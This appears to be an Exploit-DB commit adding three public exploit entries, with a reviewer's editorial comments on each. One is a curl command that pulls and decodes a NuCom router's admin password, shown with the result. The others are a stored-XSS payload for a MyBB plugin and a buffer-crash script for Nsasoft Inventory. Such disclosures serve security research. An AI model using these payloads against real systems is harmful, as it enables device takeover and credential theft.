DB: 2021-03-12

3 changes to exploits/shellcodes

Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)
NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation
MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting
Offensive Security 2021-03-12 05:02:04 +00:00
parent 128b9cd185
commit f348200ea1
4 changed files with 112 additions and 0 deletions


@ -0,0 +1,61 @@
# Exploit Title: NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation
# Date: 01.03.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.nucom.es
Vendor: NUEVAS COMUNICACIONES IBERIA, S.A.
Product web page: https://www.nucom.es
Affected version: 5.07.90_multi_NCM01
5.07.89_multi_NCM01
5.07.72_multi_NCM01
Summary: The NC routers upgrades your network to the next
generation of WiFi. With combined wireless speeds of up to
1750 Mbps, the device provides better speeds and wireless
range. Includes 2 FXS ports for any VoIP service. If you
prefer a wired connection, the NC routers have gigabit
ports to provide an incredibly fast, lag-free experience.
3.0 ports allow you to power a robust home Internet network
by sharing printers, flash storage, FTP servers, or media
players.
Desc: The application suffers from a privilege escalation
vulnerability. The non-privileged default user (user:user)
can elevate his/her privileges by sending a HTTP GET request
to the configuration backup endpoint and disclose the http
super password (admin credentials) in Base64 encoded value.
Once authenticated as admin, an attacker will be granted
access to the additional and privileged pages.
Tested on: GoAhead-Webs
Tenda
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5629
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5629.php
01.03.2021
--
lqwrm@metalgear:~/prive$ echo -e '\nThe admin password is: ' ; \
> curl -s http://192.168.0.1:8080/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.251 \
> -H 'Cookie: ecos_pw=dXNlcg==1311930653:language=en' | \
> grep -oP '(?<=http_supper_passwd=).*' | \
> base64 -d 2>/dev/null | \
> xargs echo -n ; \
> echo -e '\n-----------\n'
The admin password is:
MammaMia123
-----------
lqwrm@metalgear:~/prive$
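
Review bot: The header changes format after the fourth line: `Vendor:`, `Affected version:`, `Tested on:` and the advisory fields are unprefixed free text, while the other two entries in this commit carry `# Version:` and `# Tested on:` in the `#` header. Add `# Version: 5.07.90_multi_NCM01` and `# Tested on: GoAhead-Webs` there so the entry reads like the others. The Desc also stops at impact: it should state the root cause visible in the transcript, namely that the configuration backup endpoint answers a session of the default `user:user` account and that `http_supper_passwd` is stored only Base64-encoded, which is reversible, and it should say whether a fixed firmware exists. The transcript prints what looks like a real admin password (`MammaMia123`); a placeholder would be safer.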


@ -0,0 +1,19 @@
# Exploit Title: MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting
# Date: 1/30/2021
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1220
# Version: 1.8.22
# Tested on: Windows 10
# CVE: CVE-2021-28115
1. Description:
This plugin adds a feedback system to your forum. Edit feedback button is vulnerable to XSS.
2. Proof of Concept:
- Go to a user profile
- Add feedback and leave the following payload as comment "><script>alert(1)</script>
- View the feedback feedback.php?uid=2
- When clicking Edit payload will execute
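
Review bot: The description says only that the "Edit feedback button is vulnerable to XSS" and never classifies the issue; the steps show a stored XSS, since the comment is saved on the profile and runs later when Edit is clicked on `feedback.php?uid=2`. State that in the description and name the feedback comment as the unescaped input. The leading `">` in the payload suggests the comment is echoed into an HTML attribute value in the edit form, which is worth confirming and writing down because it tells the maintainer where output encoding is missing. `# Version: 1.8.22` is ambiguous between the plugin and MyBB itself, and no fixed version is given.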

29
exploits/windows/dos/49638.py Executable file

@ -0,0 +1,29 @@
# Exploit Title: Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)
# Exploit Author : Enes Özeser
# Exploit Date: 2021-02-28
# Vendor Homepage : https://www.nsauditor.com/
# Link Software : https://www.nsauditor.com/downloads/nhsi_setup.exe
# Version: 1.6.4.0
# Tested on: Windows 10
# Steps:
1- Run the python script. (payload.py)
2- Open payload.txt and copy content to clipboard.
3- Run 'Nsasoft Hardware Software Inventory 1.6.4.0'.
4- Register -> Enter Registeration Code
5- Paste clipboard into the "Key" or "Name".
6- Click on OK.
7- Crashed.
---> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 300
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print "File created!"
except:
print "File cannot be created!"
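
Review bot: The file is committed as `49638.py` and marked executable, but the step list (`1- Run the python script. (payload.py)` through `7- Crashed.`) and the `---> payload.py <--` separator are not commented out, so the file cannot be run as it stands. Prefix those lines with `#`, or ship the entry as `.txt` like the neighbouring DoS entries. The embedded script also uses Python 2 `print "File created!"` statements under an unversioned `#!/usr/bin/env python` shebang and a bare `except:` that hides the real error; pin the interpreter or use `print(...)`, and catch `IOError`. The title says 'multiple' while the steps name the "Key" and "Name" fields, so the header should list the affected fields explicitly.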


@ -6773,6 +6773,7 @@ id,file,description,date,author,type,platform,port
49566,exploits/windows/dos/49566.txt,"Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows, 49566,exploits/windows/dos/49566.txt,"Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
49567,exploits/windows/dos/49567.txt,"AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows, 49567,exploits/windows/dos/49567.txt,"AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
49568,exploits/windows/dos/49568.txt,"Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows, 49568,exploits/windows/dos/49568.txt,"Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
49638,exploits/windows/dos/49638.py,"Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)",2021-03-11,"Enes Özeser",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -43820,3 +43821,5 @@ id,file,description,date,author,type,platform,port
49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php, 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,
49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php, 49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php,
49633,exploits/multiple/webapps/49633.py,"Atlassian JIRA 8.11.1 - User Enumeration",2021-03-10,"Dolev Farhi",webapps,multiple, 49633,exploits/multiple/webapps/49633.py,"Atlassian JIRA 8.11.1 - User Enumeration",2021-03-10,"Dolev Farhi",webapps,multiple,
49634,exploits/hardware/webapps/49634.txt,"NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation",2021-03-11,LiquidWorm,webapps,hardware,
49635,exploits/php/webapps/49635.txt,"MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting",2021-03-11,0xB9,webapps,php,
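
Review bot: Row 49634 leaves the trailing `port` column empty, although the PoC in `49634.txt` targets the router's web interface on port 8080 (`http://192.168.0.1:8080/...`). If the column is meant to record the affected service port, set it to `8080` so the entry can be filtered by port. Row 49635 records no CVE even though its exploit file lists `CVE-2021-28115`; the header has no column for it, so that mapping has to live elsewhere.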
